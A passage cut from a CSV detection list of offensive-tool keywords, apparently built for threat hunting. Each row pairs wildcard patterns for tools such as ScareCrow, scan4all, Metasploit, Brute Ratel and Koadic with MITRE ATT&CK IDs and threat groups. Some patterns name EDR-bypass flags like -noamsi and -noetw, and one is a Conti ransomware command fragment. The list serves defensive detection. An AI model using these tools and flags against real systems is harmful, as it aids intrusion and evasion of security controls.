- T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" +"*sc delete plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*sc -path c:\inetpub\wwwroot\aspnet_client\test.txt -value teset*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #7","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sc_inject_direct.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*sc_inject_indirect.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*sc0tfree*","offensive_tool_keyword","Github Username","github username - Pentester. Red teamer. OSCP. Former wardialer and OKI 900 enthusiast. Senior Security Consultant @ctxis hosting offensve tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sc0tfree","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*scada_default_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scan -T list_of_targets.txt*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*scan4all -*.xml*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -h*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all -tp *","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all.51pwn.com*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_linux_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_macOS_arm64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scanless*","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1073","176","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z" +"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*scannerport.go -*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7647","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z" +"*ScanProcessForBadgerConfig*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ScanTCPImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 